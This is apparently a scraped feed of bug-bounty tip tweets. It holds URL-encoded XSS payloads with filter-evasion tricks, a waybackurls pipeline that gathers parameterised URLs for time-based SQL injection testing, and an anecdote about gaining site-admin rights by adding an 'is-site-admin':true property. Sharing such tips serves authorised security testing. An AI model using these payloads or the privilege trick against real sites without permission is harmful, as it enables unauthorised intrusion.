N$ 🍥(@nav1n0x) 's Twitter Profile Photo

I just added an extra property 'is-site-admin':true, and voilà, I became one of the site admins.🤣🤣🤣🤟🤟

I just added an extra property 'is-site-admin':true, and voilà, I became one of the site admins.🤣🤣🤣🤟🤟#bugbounty
account_circle
Gudetama(@gudetama_bf) 's Twitter Profile Photo

SQLi time based from WaybackURLs

Part 1

waybackurls testphp.vulnweb.com | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt

tips

SQLi time based from WaybackURLs

Part 1 

waybackurls testphp.vulnweb.com | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt 

#bugbountytips #bugbounty
account_circle
Milad Safdari(@thesafdari0x) 's Twitter Profile Photo

Sometimes I can't understand Intigriti guys, when a company claimed my report as accepte risk and I can't even reproduce it, because if I do, it might harm the company, then they may band my account.
Nice world na ?

Sometimes I can't understand @intigriti guys, when a company claimed my report as accepte risk and I can't even reproduce it, because if I do, it might harm the company, then they may band my account.
Nice world na ? #bugbounty
account_circle
Ahmad Bin Ali 🎓2020🇸🇦(@MrHex88) 's Twitter Profile Photo

could be be triggers in itself, no need to parameter injection✌🏻

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

tip tips

#XSS could be be triggers in #url itself, no need to parameter injection✌🏻

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

#bugbounty #bugbountytip #bugbountytips
#MrHex88
account_circle
Moulchi(@oualilweb) 's Twitter Profile Photo

Decompiled an Android app and discovered an endpoint vulnerable to SQLi.
Don't overlook mobile apps. they can be a goldmine for juicy things

tips

Decompiled an Android app and discovered an endpoint vulnerable to  SQLi.
Don't overlook mobile apps. they can be a goldmine for juicy  things

#bugbounty #bugbountytips
account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo

Basic XSS Encoding Tips ⏬

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e

tips

account_circle
H4x0r.DZ🇩🇿(@h4x0r_dz) 's Twitter Profile Photo

I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets!

Very Very useful on Large targets

github.com/blacklanternse…

I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets! 

Very Very useful on Large targets 

github.com/blacklanternse…

#BugBounty #bugbountytips  #infosec
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

XSS could be be triggers in itself, no need for parameter injection

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

tips

Credit:Ahmad Bin Ali 🎓2020🇸🇦

XSS could be be triggers in #url itself, no need for parameter injection

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

#bugbounty #bugbountytips

Credit:@MrHex88
account_circle